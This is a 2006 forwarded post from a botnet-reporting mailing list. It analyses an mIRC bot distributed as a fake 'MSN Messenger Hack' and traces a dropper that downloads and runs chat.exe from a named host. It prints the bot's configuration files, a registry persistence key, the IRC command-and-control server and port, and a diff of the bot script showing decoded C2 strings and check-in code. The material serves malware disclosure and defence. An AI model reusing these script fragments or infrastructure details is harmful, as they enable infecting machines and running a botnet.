To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
See attached message. reaLcoder and VoLKaN appear to be behind these.
A diff of winner1 showing the decoded strings is also attached. If anyone needs a copy of the bot, please let me know and I'll be happy to send it along. -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome.
--- Begin Message ---Sent by a listmember in #irc-security on Nightstar: 19:48:15 <ANK-37M> Msn Messenger Hack v4 >>> www.Hackmsn.no.tp (Update 08/10/06) 100% work now ! 19:48:56 <ANK-37M> Msn Messenger Hack v4 >>> www.Hackmsn.no.tp (Update 08/10/06) 100% work now ! 19:48:57 <edanur__> Msn Messenger Hack v4 >>> www.Hackmsn.no.tp (Update 08/10/06) 100% work now ! This leads to http://members.lycos.co.uk/sence/msn.exe which is a zipsfx package containing: Length Date Time Name -------- ---- ---- ---- 1705 07-14-06 21:07 xcopy.hta 165 07-14-06 21:09 sfx.ini -------- ------- 1870 2 files According to sfx.ini, xcopy.hta is dropped in c:\windows\help. xcopy.hta is vbscript which downloads http://bicirik.net/chat.exe to c:\windows\system32\chat.exe and executes it. chat.exe is another zipsfx package containing the following files: Length Date Time Name -------- ---- ---- ---- 309 07-14-06 01:25 remote.ini 40960 03-25-06 16:25 winerr.dll 153 07-28-06 21:56 flk23.reg 121 03-25-06 16:25 hell 9735 03-25-06 16:25 swins.xt 1835267 03-25-06 16:25 win.exe 2878 07-28-06 21:56 mirc.ini 27093 07-28-06 21:56 winner1 164 07-28-06 21:57 sfx.ini -------- ------- 1916680 9 files sfx.ini appears to extract the bot to c:\windows\fonts and executes win.exe (mIRC). The only files clamav detects anything wrong with are: ./winerr.dll: Trojan.Flood.I FOUND ./winner1: Worm.Randon-7 FOUND Interesting highlights from several files: mirc.ini: [Mirc] host=irc.darbe.infoSERVER:irc.darbe.info:8089 user=gfhg email=jhgj nick=[XP-6576446] anick=[XP-4921729] flk23.reg: REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Win"="C:\\Documents and Settings\\VoLKaN\\Desktop\\Yeni Klas?r\\win.exe" remote.ini: [variables] n0=%reaLcoder 73 n1=%filetoboot flk23.reg n2=%a 1 n3=%many 2 n4=%infecttime Thursday 16/02/2006 17:53:25 n5=%fnick 10 n6=%b Online n7=%c www.Darbe.info n8=%d [EMAIL PROTECTED] n9=%e .NET Messenger Service n10=%x 0 n11=%cserver irc.darbe.info n12=%cport 7574 n13=%QHTread :Welcome www.hackmsn.no.tp resolves to 213.239.203.47 (talentunion.de). bicirik.net resolves to 66.90.122.3 (FDCServers) whois on 66.90.122.3: network:Auth-Area:66.90.64.0/18 network:Class-Name:network network:OrgName:goksel network:OrgID;I:GOKSEL-MELEKORG network:Address:gazi mah 1124 no network:City:istanbul network:StateProv:N/A network:PostalCode:34120 network:Country:TURKEY network:NetRange:66.90.122.0-66.90.122.31 network:CIDR:66.90.122.0/27 network:NetName:GOKSEL-MELEKORG network:OrgAbuseHandle:FDCservers Customer network:OrgAbuseName:goksel network:OrgAbusePhone:+90 216 567 95 85 network:OrgAbuseEmail:[EMAIL PROTECTED] irc.darbe.info resolves to 89.149.202.34 (dakikhost.com / Netdirekt.de) -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome.
signature.asc
Description: Digital signature_______________________________________________ irc-security mailing list [EMAIL PROTECTED] http://lists.irc-unity.org/mailman/listinfo/irc-security
--- End Message ---
--- winner1.orig 2006-07-28 21:56:06.000000000 -0400
+++ winner1 2006-08-12 16:12:05.000000000 -0400
@@ -183,11 +183,11 @@
alias s33 { if ($appactive = $true) { /exit } }
on *:connect:{ hostnick | .timerjc 0 $rand(2,20) /jc | .timercheck off |
.timer 0 30 /jc | .inc %reaLcoder | if (%reaLcoder = 1) { .saym $rds(rc) iam
New owned - $ip - $host - $uptime(system,2) | .pdcc on | .fsend on | .clearall
} }
alias rds {
- if ($1 = sr) { return $decode(aXJjLmRhcmJlLmluZm8=,m) }
- if ($1 = sp) { return $decode(ODA4OQ==,m) }
- if ($1 = sc) { return $decode(I3dhcmV6,m) }
- if ($1 = sk) { return $decode(QnVzZW0=,m) }
- if ($1 = rc) { return $decode(I3dhcmV6,m) }
+ if ($1 = sr) { return irc.darbe.info }
+ if ($1 = sp) { return 8089 }
+ if ($1 = sc) { return #warez }
+ if ($1 = sk) { return Busem }
+ if ($1 = rc) { return #warez }
}
alias hostnick {
if (.edu isin $host) || (.ad. isin $host) || (.ac. isin $host) || (.cc. isin
$host) || (uni isin $host) && (wk isin $uptime(system,2)) { nick [edu-wk- $+
$r(1000,9999) $+ $r(100,999) $+ ]] | goto end }
signature.asc
Description: Digital signature
_______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
